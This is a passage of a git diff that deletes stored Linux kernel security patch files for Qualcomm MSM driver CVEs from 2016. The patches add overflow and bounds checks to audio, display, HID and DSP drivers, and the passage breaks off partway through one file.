- 1 file changed, 7 insertions(+)
-
-diff --git a/sound/soc/msm/msm-cpe-lsm.c b/sound/soc/msm/msm-cpe-lsm.c
-index 6483b93..0c10829 100644
---- a/sound/soc/msm/msm-cpe-lsm.c
-+++ b/sound/soc/msm/msm-cpe-lsm.c
-@@ -1874,6 +1874,13 @@ static int msm_cpe_lsm_reg_model(struct snd_pcm_substream *substream,
-
- lsm_ops->lsm_get_snd_model_offset(cpe->core_handle,
- session, &offset);
-+ /* Check if 'p_info->param_size + offset' crosses U32_MAX. */
-+ if (p_info->param_size > U32_MAX - offset) {
-+ dev_err(rtd->dev,
-+ "%s: Invalid param_size %d\n",
-+ __func__, p_info->param_size);
-+ return -EINVAL;
-+ }
- session->snd_model_size = p_info->param_size + offset;
-
- session->snd_model_data = vzalloc(session->snd_model_size);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5860/4.4/0003.patch b/Patches/Linux_CVEs/CVE-2016-5860/4.4/0003.patch
deleted file mode 100644
index c005480c..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5860/4.4/0003.patch
+++ /dev/null
@@ -1,36 +0,0 @@
-From 9f91ae0d7203714fc39ae78e1f1c4fd71ed40498 Mon Sep 17 00:00:00 2001
-From: Karthik Reddy Katta
-Date: Wed, 28 Dec 2016 11:24:33 +0530
-Subject: drivers: soc: qcom: Add overflow check for sound model size
-
-Overflow check is added for sound model size to prevent
-heap overflow while allocating memory for sound model data.
-
-CRs-Fixed: 1100682
-Change-Id: Id38523a5e79028c692670e84d5fe924a855a5a10
-Signed-off-by: Karthik Reddy Katta
----
- sound/soc/msm/msm-cpe-lsm.c | 7 +++++++
- 1 file changed, 7 insertions(+)
-
-diff --git a/sound/soc/msm/msm-cpe-lsm.c b/sound/soc/msm/msm-cpe-lsm.c
-index ef4c9b0..5b90cc1 100644
---- a/sound/soc/msm/msm-cpe-lsm.c
-+++ b/sound/soc/msm/msm-cpe-lsm.c
-@@ -1878,6 +1878,13 @@ static int msm_cpe_lsm_reg_model(struct snd_pcm_substream *substream,
-
- lsm_ops->lsm_get_snd_model_offset(cpe->core_handle,
- session, &offset);
-+ /* Check if 'p_info->param_size + offset' crosses U32_MAX. */
-+ if (p_info->param_size > U32_MAX - offset) {
-+ dev_err(rtd->dev,
-+ "%s: Invalid param_size %d\n",
-+ __func__, p_info->param_size);
-+ return -EINVAL;
-+ }
- session->snd_model_size = p_info->param_size + offset;
-
- session->snd_model_data = vzalloc(session->snd_model_size);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5861/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-5861/ANY/0001.patch
deleted file mode 100644
index b764d960..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5861/ANY/0001.patch
+++ /dev/null
@@ -1,40 +0,0 @@
-From cf3c97b8b6165f13810e530068fbf94b07f1f77d Mon Sep 17 00:00:00 2001
-From: Ping Li
-Date: Tue, 3 Jan 2017 11:48:06 -0800
-Subject: msm: mdss: Add sanity check for Gamut LUT size
-
-The Gamut LUT size passed from user space needs to go through
-a sanity check to avoid heap overflow. This patch adds the missing
-sanity check in the Gamut LUT config write path.
-
-Change-Id: I365938e06dbc6ca01961c9be01db10a5a9c863e4
-Signed-off-by: Ping Li
----
- drivers/video/fbdev/msm/mdss_mdp_pp.c | 7 ++++++-
- 1 file changed, 6 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/video/fbdev/msm/mdss_mdp_pp.c b/drivers/video/fbdev/msm/mdss_mdp_pp.c
-index 30dd3c8..951beae 100644
---- a/drivers/video/fbdev/msm/mdss_mdp_pp.c
-+++ b/drivers/video/fbdev/msm/mdss_mdp_pp.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2017, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -4827,6 +4827,11 @@ gamut_clk_off:
- goto gamut_set_dirty;
- }
- }
-+ if (pp_gm_has_invalid_lut_size(config)) {
-+ pr_debug("invalid lut size for gamut\n");
-+ ret = -EINVAL;
-+ goto gamut_config_exit;
-+ }
- local_cfg = *config;
- tbl_off = mdss_pp_res->gamut_tbl[disp_num];
- for (i = 0; i < MDP_GAMUT_TABLE_NUM; i++) {
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5862/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-5862/ANY/0001.patch
deleted file mode 100644
index cfff207a..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5862/ANY/0001.patch
+++ /dev/null
@@ -1,31 +0,0 @@
-From 4199451e83729a3add781eeafaee32994ff65b04 Mon Sep 17 00:00:00 2001
-From: Aditya Bavanari
-Date: Thu, 22 Dec 2016 16:41:27 +0530
-Subject: ASoC: msm8996: Fix kernel crash in "Speaker Function" mixer control
-
-Use snd_soc_kcontrol_codec instead of snd_kcontrol_chip
-to obtain the codec information from the kcontrol.
-
-CRs-Fixed: 1099607
-Change-Id: Iba3004c2745e5f0bbe778e44c803826351b3b939
-Signed-off-by: Aditya Bavanari
----
- sound/soc/msm/msm8996.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/sound/soc/msm/msm8996.c b/sound/soc/msm/msm8996.c
-index 84d4ede..4eafd32 100644
---- a/sound/soc/msm/msm8996.c
-+++ b/sound/soc/msm/msm8996.c
-@@ -351,7 +351,7 @@ static int msm8996_get_spk(struct snd_kcontrol *kcontrol,
- static int msm8996_set_spk(struct snd_kcontrol *kcontrol,
- struct snd_ctl_elem_value *ucontrol)
- {
-- struct snd_soc_codec *codec = snd_kcontrol_chip(kcontrol);
-+ struct snd_soc_codec *codec = snd_soc_kcontrol_codec(kcontrol);
-
- pr_debug("%s() ucontrol->value.integer.value[0] = %ld\n",
- __func__, ucontrol->value.integer.value[0]);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5863/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-5863/ANY/0001.patch
deleted file mode 100644
index 53e70f2e..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5863/ANY/0001.patch
+++ /dev/null
@@ -1,53 +0,0 @@
-From daf0acd54a6a80de227baef9a06285e4aa5f8c93 Mon Sep 17 00:00:00 2001
-From: Sriharsha Allenki
-Date: Thu, 22 Dec 2016 14:57:44 +0530
-Subject: hid: usbhid: Changes to prevent buffer overflow
-
-Moved some value checks to right positions to prevent
-buffer flow, which may be possible before. Previously
-these value checks are in an else statement which may
-not be executed.
-
-Change-Id: I02dbecd074183581a6bdae6377097bc004bd3d3c
-CRs-fixed: 1102936
-Signed-off-by: Sriharsha Allenki
----
- drivers/hid/usbhid/hiddev.c | 19 ++++++++++---------
- 1 file changed, 10 insertions(+), 9 deletions(-)
-
-diff --git a/drivers/hid/usbhid/hiddev.c b/drivers/hid/usbhid/hiddev.c
-index 2f1ddca..602f163 100644
---- a/drivers/hid/usbhid/hiddev.c
-+++ b/drivers/hid/usbhid/hiddev.c
-@@ -510,18 +510,19 @@ static noinline int hiddev_ioctl_usage(struct hiddev *hiddev, unsigned int cmd,
- goto inval;
-
- field = report->field[uref->field_index];
-+ }
-
-- if (cmd == HIDIOCGCOLLECTIONINDEX) {
-- if (uref->usage_index >= field->maxusage)
-- goto inval;
-- } else if (uref->usage_index >= field->report_count)
-+ if (cmd == HIDIOCGCOLLECTIONINDEX) {
-+ if (uref->usage_index >= field->maxusage)
- goto inval;
-+ } else if (uref->usage_index >= field->report_count)
-+ goto inval;
-
-- else if ((cmd == HIDIOCGUSAGES || cmd == HIDIOCSUSAGES) &&
-- (uref_multi->num_values > HID_MAX_MULTI_USAGES ||
-- uref->usage_index + uref_multi->num_values > field->report_count))
-- goto inval;
-- }
-+ else if ((cmd == HIDIOCGUSAGES || cmd == HIDIOCSUSAGES) &&
-+ (uref_multi->num_values > HID_MAX_MULTI_USAGES ||
-+ uref->usage_index + uref_multi->num_values >
-+ field->report_count))
-+ goto inval;
-
- switch (cmd) {
- case HIDIOCGUSAGE:
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5864/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-5864/ANY/0001.patch
deleted file mode 100644
index b8fbce6c..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5864/ANY/0001.patch
+++ /dev/null
@@ -1,132 +0,0 @@ -From cbc21ceb69cb7bca0643423a7ca982abce3ce50a Mon Sep 17 00:00:00 2001 -From: Vidyakumar Athota -Date: Wed, 4 Jan 2017 13:32:50 -0800 -Subject: soc: qcom: check userspace buffer size in write() - -Add checks to make sure userspace buffer is valid before -it is used. Add upper limit for glink channels and number -of intents allowed. - -Change-Id: I9b8f2e47aada7922ba22cbb010176bf36a9d6288 -Signed-off-by: Vidyakumar Athota ---- - drivers/soc/qcom/wcd-dsp-glink.c | 51 ++++++++++++++++++++++++++++++++-------- - 1 file changed, 41 insertions(+), 10 deletions(-) - -diff --git a/drivers/soc/qcom/wcd-dsp-glink.c b/drivers/soc/qcom/wcd-dsp-glink.c -index 27e66dc..1ceded4 100644 ---- a/drivers/soc/qcom/wcd-dsp-glink.c -+++ b/drivers/soc/qcom/wcd-dsp-glink.c -@@ -1,4 +1,4 @@ --/* Copyright (c) 2016, The Linux Foundation. All rights reserved. -+/* Copyright (c) 2016-2017, The Linux Foundation. All rights reserved. - * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -25,8 +25,10 @@ - #include "sound/wcd-dsp-glink.h" - - #define WDSP_GLINK_DRIVER_NAME "wcd-dsp-glink" --#define WDSP_MAX_WRITE_SIZE (512 * 1024) -+#define WDSP_MAX_WRITE_SIZE (256 * 1024) - #define WDSP_MAX_READ_SIZE (4 * 1024) -+#define WDSP_MAX_NO_OF_INTENTS (20) -+#define WDSP_MAX_NO_OF_CHANNELS (10) - - #define MINOR_NUMBER_COUNT 1 - #define WDSP_EDGE "wdsp" -@@ -532,15 +534,30 @@ static int wdsp_glink_ch_info_init(struct wdsp_glink_priv *wpriv, - payload = (u8 *)pkt->payload; - no_of_channels = pkt->no_of_channels; - -+ if (no_of_channels > WDSP_MAX_NO_OF_CHANNELS) { -+ dev_info(wpriv->dev, "%s: no_of_channels = %d are limited to %d\n", -+ __func__, no_of_channels, WDSP_MAX_NO_OF_CHANNELS); -+ no_of_channels = WDSP_MAX_NO_OF_CHANNELS; -+ } - ch = kcalloc(no_of_channels, sizeof(struct wdsp_glink_ch *), - GFP_KERNEL); - if (!ch) { - ret = -ENOMEM; - goto done; - } -+ wpriv->ch = ch; -+ 
wpriv->no_of_channels = no_of_channels; - - for (i = 0; i < no_of_channels; i++) { - ch_cfg = (struct wdsp_glink_ch_cfg *)payload; -+ -+ if (ch_cfg->no_of_intents > WDSP_MAX_NO_OF_INTENTS) { -+ dev_err(wpriv->dev, "%s: Invalid no_of_intents = %d\n", -+ __func__, ch_cfg->no_of_intents); -+ ret = -EINVAL; -+ goto err_ch_mem; -+ } -+ - ch_cfg_size = sizeof(struct wdsp_glink_ch_cfg) + - (sizeof(u32) * ch_cfg->no_of_intents); - ch_size = sizeof(struct wdsp_glink_ch) + -@@ -564,8 +581,6 @@ static int wdsp_glink_ch_info_init(struct wdsp_glink_priv *wpriv, - INIT_WORK(&ch[i]->lcl_ch_cls_wrk, wdsp_glink_lcl_ch_cls_wrk); - init_waitqueue_head(&ch[i]->ch_connect_wait); - } -- wpriv->ch = ch; -- wpriv->no_of_channels = no_of_channels; - - INIT_WORK(&wpriv->ch_open_cls_wrk, wdsp_glink_ch_open_cls_wrk); - -@@ -746,15 +761,17 @@ static ssize_t wdsp_glink_write(struct file *file, const char __user *buf, - goto done; - } - -- dev_dbg(wpriv->dev, "%s: count = %zd\n", __func__, count); -- -- if (count > WDSP_MAX_WRITE_SIZE) { -- dev_info(wpriv->dev, "%s: count = %zd is more than WDSP_MAX_WRITE_SIZE\n", -+ if ((count < sizeof(struct wdsp_write_pkt)) || -+ (count > WDSP_MAX_WRITE_SIZE)) { -+ dev_err(wpriv->dev, "%s: Invalid count = %zd\n", - __func__, count); -- count = WDSP_MAX_WRITE_SIZE; -+ ret = -EINVAL; -+ goto done; - } - -- tx_buf_size = count + sizeof(struct wdsp_glink_tx_buf); -+ dev_dbg(wpriv->dev, "%s: count = %zd\n", __func__, count); -+ -+ tx_buf_size = WDSP_MAX_WRITE_SIZE + sizeof(struct wdsp_glink_tx_buf); - tx_buf = kzalloc(tx_buf_size, GFP_KERNEL); - if (!tx_buf) { - ret = -ENOMEM; -@@ -772,6 +789,13 @@ static ssize_t wdsp_glink_write(struct file *file, const char __user *buf, - wpkt = (struct wdsp_write_pkt *)tx_buf->buf; - switch (wpkt->pkt_type) { - case WDSP_REG_PKT: -+ if (count <= (sizeof(struct wdsp_write_pkt) + -+ sizeof(struct wdsp_reg_pkt))) { -+ dev_err(wpriv->dev, "%s: Invalid reg pkt size = %zd\n", -+ __func__, count); -+ ret = -EINVAL; -+ goto free_buf; 
-+ } - ret = wdsp_glink_ch_info_init(wpriv, - (struct wdsp_reg_pkt *)wpkt->payload); - if (IS_ERR_VALUE(ret)) -@@ -794,6 +818,13 @@ static ssize_t wdsp_glink_write(struct file *file, const char __user *buf, - kfree(tx_buf); - break; - case WDSP_CMD_PKT: -+ if (count <= (sizeof(struct wdsp_write_pkt) + -+ sizeof(struct wdsp_cmd_pkt))) { -+ dev_err(wpriv->dev, "%s: Invalid cmd pkt size = %zd\n", -+ __func__, count); -+ ret = -EINVAL; -+ goto free_buf; -+ } - mutex_lock(&wpriv->glink_mutex); - if (wpriv->glink_state.link_state == GLINK_LINK_STATE_DOWN) { - mutex_unlock(&wpriv->glink_mutex); --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-5867/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2016-5867/3.10/0001.patch deleted file mode 100644 index fd845599..00000000 --- a/Patches/Linux_CVEs/CVE-2016-5867/3.10/0001.patch +++ /dev/null 
@@ -1,51 +0,0 @@
-From 8db70aafea51b60dbe9faaba5707be0046758521 Mon Sep 17 00:00:00 2001
-From: Sharad Sangle
-Date: Mon, 19 Dec 2016 17:00:25 +0530
-Subject: ASoC: msm: qdsp6v2: DAP: Add check to validate param length
-
-To avoid buffer overflow, validate input length used to
-set Dolby params.
-
-Change-Id: I3f9d6040f118f63b60c20c83b0d8cae638f4a530
-CRs-Fixed: 1095947
-Signed-off-by: Sharad Sangle
----
- sound/soc/msm/qdsp6v2/msm-dolby-dap-config.c | 15 ++++++++++++++-
- 1 file changed, 14 insertions(+), 1 deletion(-)
-
-diff --git a/sound/soc/msm/qdsp6v2/msm-dolby-dap-config.c b/sound/soc/msm/qdsp6v2/msm-dolby-dap-config.c
-index bb0f890..493daf4 100644
---- a/sound/soc/msm/qdsp6v2/msm-dolby-dap-config.c
-+++ b/sound/soc/msm/qdsp6v2/msm-dolby-dap-config.c
-@@ -677,7 +677,7 @@ int msm_dolby_dap_param_to_set_control_put(struct snd_kcontrol *kcontrol,
- struct snd_ctl_elem_value *ucontrol)
- {
- int rc = 0, port_id, copp_idx;
-- uint32_t idx, j;
-+ uint32_t idx, j, current_offset;
- uint32_t device = ucontrol->value.integer.value[0];
- uint32_t param_id = ucontrol->value.integer.value[1];
- uint32_t offset = ucontrol->value.integer.value[2];
-@@ -754,6 +754,19 @@ int msm_dolby_dap_param_to_set_control_put(struct snd_kcontrol *kcontrol,
- default: {
- /* cache the parameters */
- dolby_dap_params_modified[idx] += 1;
-+ current_offset = dolby_dap_params_offset[idx] + offset;
-+ if (current_offset >= TOTAL_LENGTH_DOLBY_PARAM) {
-+ pr_err("%s: invalid offset %d at idx %d\n",
-+ __func__, offset, idx);
-+ return -EINVAL;
-+ }
-+ if ((0 == length) || (current_offset + length - 1
-+ < current_offset) || (current_offset + length
-+ > TOTAL_LENGTH_DOLBY_PARAM)) {
-+ pr_err("%s: invalid length %d at idx %d\n",
-+ __func__, length, idx);
-+ return -EINVAL;
-+ }
- dolby_dap_params_length[idx] = length;
- pr_debug("%s: param recvd deviceId=0x%x paramId=0x%x offset=%d length=%d\n",
- __func__, device, param_id, offset, length);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5867/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2016-5867/3.18/0002.patch
deleted file mode 100644
index 2d7611f0..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5867/3.18/0002.patch
+++ /dev/null
@@ -1,51 +0,0 @@
-From 065360da7147003aed8f59782b7652d565f56be5 Mon Sep 17 00:00:00 2001
-From: Sharad Sangle
-Date: Mon, 19 Dec 2016 17:00:25 +0530
-Subject: ASoC: msm: qdsp6v2: DAP: Add check to validate param length
-
-To avoid buffer overflow, validate input length used to
-set Dolby params.
-
-Change-Id: I3f9d6040f118f63b60c20c83b0d8cae638f4a530
-CRs-Fixed: 1095947
-Signed-off-by: Sharad Sangle
----
- sound/soc/msm/qdsp6v2/msm-dolby-dap-config.c | 15 ++++++++++++++-
- 1 file changed, 14 insertions(+), 1 deletion(-)
-
-diff --git a/sound/soc/msm/qdsp6v2/msm-dolby-dap-config.c b/sound/soc/msm/qdsp6v2/msm-dolby-dap-config.c
-index 5866e46..d270b3d 100644
---- a/sound/soc/msm/qdsp6v2/msm-dolby-dap-config.c
-+++ b/sound/soc/msm/qdsp6v2/msm-dolby-dap-config.c
-@@ -681,7 +681,7 @@ int msm_dolby_dap_param_to_set_control_put(struct snd_kcontrol *kcontrol,
- struct snd_ctl_elem_value *ucontrol)
- {
- int rc = 0, port_id, copp_idx;
-- uint32_t idx, j;
-+ uint32_t idx, j, current_offset;
- uint32_t device = ucontrol->value.integer.value[0];
- uint32_t param_id = ucontrol->value.integer.value[1];
- uint32_t offset = ucontrol->value.integer.value[2];
-@@ -758,6 +758,19 @@ int msm_dolby_dap_param_to_set_control_put(struct snd_kcontrol *kcontrol,
- default: {
- /* cache the parameters */
- dolby_dap_params_modified[idx] += 1;
-+ current_offset = dolby_dap_params_offset[idx] + offset;
-+ if (current_offset >= TOTAL_LENGTH_DOLBY_PARAM) {
-+ pr_err("%s: invalid offset %d at idx %d\n",
-+ __func__, offset, idx);
-+ return -EINVAL;
-+ }
-+ if ((0 == length) || (current_offset + length - 1
-+ < current_offset) || (current_offset + length
-+ > TOTAL_LENGTH_DOLBY_PARAM)) {
-+ pr_err("%s: invalid length %d at idx %d\n",
-+ __func__, length, idx);
-+ return -EINVAL;
-+ }
- dolby_dap_params_length[idx] = length;
- pr_debug("%s: param recvd deviceId=0x%x paramId=0x%x offset=%d length=%d\n",
- __func__, device, param_id, offset, length);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5867/4.4/0003.patch b/Patches/Linux_CVEs/CVE-2016-5867/4.4/0003.patch
deleted file mode 100644
index ec36d15d..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5867/4.4/0003.patch
+++ /dev/null
@@ -1,51 +0,0 @@
-From 5e3dd3f21b44424405a009ba676df52322d9e7cf Mon Sep 17 00:00:00 2001
-From: Sharad Sangle
-Date: Mon, 19 Dec 2016 17:00:25 +0530
-Subject: ASoC: msm: qdsp6v2: DAP: Add check to validate param length
-
-To avoid buffer overflow, validate input length used to
-set Dolby params.
-
-Change-Id: I3f9d6040f118f63b60c20c83b0d8cae638f4a530
-CRs-Fixed: 1095947
-Signed-off-by: Sharad Sangle
----
- sound/soc/msm/qdsp6v2/msm-dolby-dap-config.c | 15 ++++++++++++++-
- 1 file changed, 14 insertions(+), 1 deletion(-)
-
-diff --git a/sound/soc/msm/qdsp6v2/msm-dolby-dap-config.c b/sound/soc/msm/qdsp6v2/msm-dolby-dap-config.c
-index df32ede..8da75d7 100644
---- a/sound/soc/msm/qdsp6v2/msm-dolby-dap-config.c
-+++ b/sound/soc/msm/qdsp6v2/msm-dolby-dap-config.c
-@@ -681,7 +681,7 @@ int msm_dolby_dap_param_to_set_control_put(struct snd_kcontrol *kcontrol,
- struct snd_ctl_elem_value *ucontrol)
- {
- int rc = 0, port_id, copp_idx;
-- uint32_t idx, j;
-+ uint32_t idx, j, current_offset;
- uint32_t device = ucontrol->value.integer.value[0];
- uint32_t param_id = ucontrol->value.integer.value[1];
- uint32_t offset = ucontrol->value.integer.value[2];
-@@ -758,6 +758,19 @@ int msm_dolby_dap_param_to_set_control_put(struct snd_kcontrol *kcontrol,
- default: {
- /* cache the parameters */
- dolby_dap_params_modified[idx] += 1;
-+ current_offset = dolby_dap_params_offset[idx] + offset;
-+ if (current_offset >= TOTAL_LENGTH_DOLBY_PARAM) {
-+ pr_err("%s: invalid offset %d at idx %d\n",
-+ __func__, offset, idx);
-+ return -EINVAL;
-+ }
-+ if ((length == 0) || (current_offset + length - 1
-+ < current_offset) || (current_offset + length
-+ > TOTAL_LENGTH_DOLBY_PARAM)) {
-+ pr_err("%s: invalid length %d at idx %d\n",
-+ __func__, length, idx);
-+ return -EINVAL;
-+ }
- dolby_dap_params_length[idx] = length;
- pr_debug("%s: param recvd deviceId=0x%x paramId=0x%x offset=%d length=%d\n",
- __func__, device, param_id, offset, length);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5868/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2016-5868/3.10/0001.patch
deleted file mode 100644
index c78fd7d3..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5868/3.10/0001.patch
+++ /dev/null
@@ -1,525 +0,0 @@ -From dc85dc0b21b1ee3715ee6e80f405d5606ca5e8d2 Mon Sep 17 00:00:00 2001 -From: Ghanim Fodi -Date: Tue, 3 Jan 2017 12:11:18 +0200 -Subject: msm: rndis_ipa: Remove rndis_ipa loopback functionality - -Rndis_ipa loopback functionality at rndis_ipa driver -is a debug functionality that is not used. - -Change-Id: Ibbcb26d3871cffeb46b028efcf4d428e88eb9e10 -CRs-fixed: 1104431 -Signed-off-by: Ghanim Fodi ---- - drivers/net/ethernet/msm/rndis_ipa.c | 432 +---------------------------------- - 1 file changed, 1 insertion(+), 431 deletions(-) - -diff --git a/drivers/net/ethernet/msm/rndis_ipa.c b/drivers/net/ethernet/msm/rndis_ipa.c -index 09b85fb..c61e2a7 100644 ---- a/drivers/net/ethernet/msm/rndis_ipa.c -+++ b/drivers/net/ethernet/msm/rndis_ipa.c -@@ -1,4 +1,4 @@ --/* Copyright (c) 2013-2015, The Linux Foundation. All rights reserved. -+/* Copyright (c) 2013-2015, 2017 The Linux Foundation. All rights reserved. - * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -132,29 +132,6 @@ enum rndis_ipa_operation { - RNDIS_IPA_DEBUG("Driver state: %s\n",\ - rndis_ipa_state_string(ctx->state)); - --/** -- * struct rndis_loopback_pipe - hold all information needed for -- * pipe loopback logic -- */ --struct rndis_loopback_pipe { -- struct sps_pipe *ipa_sps; -- struct ipa_sps_params ipa_sps_connect; -- struct ipa_connect_params ipa_connect_params; -- -- struct sps_pipe *dma_sps; -- struct sps_connect dma_connect; -- -- struct sps_alloc_dma_chan dst_alloc; -- struct sps_dma_chan ipa_sps_channel; -- enum sps_mode mode; -- u32 ipa_peer_bam_hdl; -- u32 peer_pipe_index; -- u32 ipa_drv_ep_hdl; -- u32 ipa_pipe_index; -- enum ipa_client_type ipa_client; -- ipa_notify_cb ipa_callback; -- struct ipa_ep_cfg *ipa_ep_cfg; --}; - - /** - * struct rndis_ipa_dev - main driver context parameters -@@ -169,13 +146,9 @@ struct rndis_loopback_pipe { - * @rx_dump_enable: dump all Rx packets - 
* @icmp_filter: allow all ICMP packet to pass through the filters - * @rm_enable: flag that enable/disable Resource manager request prior to Tx -- * @loopback_enable: flag that enable/disable USB stub loopback - * @deaggregation_enable: enable/disable IPA HW deaggregation logic - * @during_xmit_error: flags that indicate that the driver is in a middle - * of error handling in Tx path -- * @usb_to_ipa_loopback_pipe: usb to ipa (Rx) pipe representation for loopback -- * @ipa_to_usb_loopback_pipe: ipa to usb (Tx) pipe representation for loopback -- * @bam_dma_hdl: handle representing bam-dma, used for loopback logic - * @directory: holds all debug flags used by the driver to allow cleanup - * for driver unload - * @eth_ipv4_hdr_hdl: saved handle for ipv4 header-insertion table -@@ -205,12 +178,8 @@ struct rndis_ipa_dev { - u32 rx_dump_enable; - u32 icmp_filter; - u32 rm_enable; -- bool loopback_enable; - u32 deaggregation_enable; - u32 during_xmit_error; -- struct rndis_loopback_pipe usb_to_ipa_loopback_pipe; -- struct rndis_loopback_pipe ipa_to_usb_loopback_pipe; -- u32 bam_dma_hdl; - struct dentry *directory; - uint32_t eth_ipv4_hdr_hdl; - uint32_t eth_ipv6_hdr_hdl; -@@ -274,31 +243,12 @@ static int resource_request(struct rndis_ipa_dev *rndis_ipa_ctx); - static void resource_release(struct rndis_ipa_dev *rndis_ipa_ctx); - static netdev_tx_t rndis_ipa_start_xmit(struct sk_buff *skb, - struct net_device *net); --static int rndis_ipa_loopback_pipe_create( -- struct rndis_ipa_dev *rndis_ipa_ctx, -- struct rndis_loopback_pipe *loopback_pipe); --static void rndis_ipa_destroy_loopback_pipe( -- struct rndis_loopback_pipe *loopback_pipe); --static int rndis_ipa_create_loopback(struct rndis_ipa_dev *rndis_ipa_ctx); --static void rndis_ipa_destroy_loopback(struct rndis_ipa_dev *rndis_ipa_ctx); --static int rndis_ipa_setup_loopback(bool enable, -- struct rndis_ipa_dev *rndis_ipa_ctx); --static int rndis_ipa_debugfs_loopback_open(struct inode *inode, -- struct file *file); - 
static int rndis_ipa_debugfs_atomic_open(struct inode *inode, - struct file *file); - static int rndis_ipa_debugfs_aggr_open(struct inode *inode, - struct file *file); - static ssize_t rndis_ipa_debugfs_aggr_write(struct file *file, - const char __user *buf, size_t count, loff_t *ppos); --static ssize_t rndis_ipa_debugfs_loopback_write(struct file *file, -- const char __user *buf, size_t count, loff_t *ppos); --static ssize_t rndis_ipa_debugfs_enable_write(struct file *file, -- const char __user *buf, size_t count, loff_t *ppos); --static ssize_t rndis_ipa_debugfs_enable_read(struct file *file, -- char __user *ubuf, size_t count, loff_t *ppos); --static ssize_t rndis_ipa_debugfs_loopback_read(struct file *file, -- char __user *ubuf, size_t count, loff_t *ppos); - static ssize_t rndis_ipa_debugfs_atomic_read(struct file *file, - char __user *ubuf, size_t count, loff_t *ppos); - static void rndis_ipa_dump_skb(struct sk_buff *skb); -@@ -333,12 +283,6 @@ const struct file_operations rndis_ipa_debugfs_atomic_ops = { - .read = rndis_ipa_debugfs_atomic_read, - }; - --const struct file_operations rndis_ipa_loopback_ops = { -- .open = rndis_ipa_debugfs_loopback_open, -- .read = rndis_ipa_debugfs_loopback_read, -- .write = rndis_ipa_debugfs_loopback_write, --}; -- - const struct file_operations rndis_ipa_aggr_ops = { - .open = rndis_ipa_debugfs_aggr_open, - .write = rndis_ipa_debugfs_aggr_write, -@@ -2188,14 +2132,6 @@ static int rndis_ipa_debugfs_init(struct rndis_ipa_dev *rndis_ipa_ctx) - goto fail_file; - } - -- file = debugfs_create_file("loopback_enable", flags_read_write, -- rndis_ipa_ctx->directory, -- rndis_ipa_ctx, &rndis_ipa_loopback_ops); -- if (!file) { -- RNDIS_IPA_ERROR("could not create outstanding file\n"); -- goto fail_file; -- } -- - file = debugfs_create_u8("state", flags_read_only, - rndis_ipa_ctx->directory, (u8 *)&rndis_ipa_ctx->state); - if (!file) { -@@ -2351,59 +2287,6 @@ static ssize_t rndis_ipa_debugfs_aggr_write(struct file *file, - return count; 
- } - --static int rndis_ipa_debugfs_loopback_open(struct inode *inode, -- struct file *file) --{ -- struct rndis_ipa_dev *rndis_ipa_ctx = inode->i_private; -- file->private_data = rndis_ipa_ctx; -- -- return 0; --} -- --static ssize_t rndis_ipa_debugfs_loopback_read(struct file *file, -- char __user *ubuf, size_t count, loff_t *ppos) --{ -- int cnt; -- struct rndis_ipa_dev *rndis_ipa_ctx = file->private_data; -- -- file->private_data = &rndis_ipa_ctx->loopback_enable; -- -- cnt = rndis_ipa_debugfs_enable_read(file, -- ubuf, count, ppos); -- -- return cnt; --} -- --static ssize_t rndis_ipa_debugfs_loopback_write(struct file *file, -- const char __user *buf, size_t count, loff_t *ppos) --{ -- int retval; -- int cnt; -- struct rndis_ipa_dev *rndis_ipa_ctx = file->private_data; -- bool old_state = rndis_ipa_ctx->loopback_enable; -- -- file->private_data = &rndis_ipa_ctx->loopback_enable; -- -- cnt = rndis_ipa_debugfs_enable_write(file, -- buf, count, ppos); -- -- RNDIS_IPA_DEBUG("loopback_enable was set to:%d->%d\n", -- old_state, rndis_ipa_ctx->loopback_enable); -- -- if (old_state == rndis_ipa_ctx->loopback_enable) { -- RNDIS_IPA_ERROR("NOP - same state\n"); -- return cnt; -- } -- -- retval = rndis_ipa_setup_loopback( -- rndis_ipa_ctx->loopback_enable, -- rndis_ipa_ctx); -- if (retval) -- rndis_ipa_ctx->loopback_enable = old_state; -- -- return cnt; --} -- - static int rndis_ipa_debugfs_atomic_open(struct inode *inode, struct file *file) - { - struct rndis_ipa_dev *rndis_ipa_ctx = inode->i_private; -@@ -2434,319 +2317,6 @@ static ssize_t rndis_ipa_debugfs_atomic_read(struct file *file, - return simple_read_from_buffer(ubuf, count, ppos, atomic_str, nbytes); - } - --static ssize_t rndis_ipa_debugfs_enable_read(struct file *file, -- char __user *ubuf, size_t count, loff_t *ppos) --{ -- int nbytes; -- int size = 0; -- int ret; -- loff_t pos; -- u8 enable_str[sizeof(char)*3] = {0}; -- bool *enable = file->private_data; -- pos = *ppos; -- nbytes 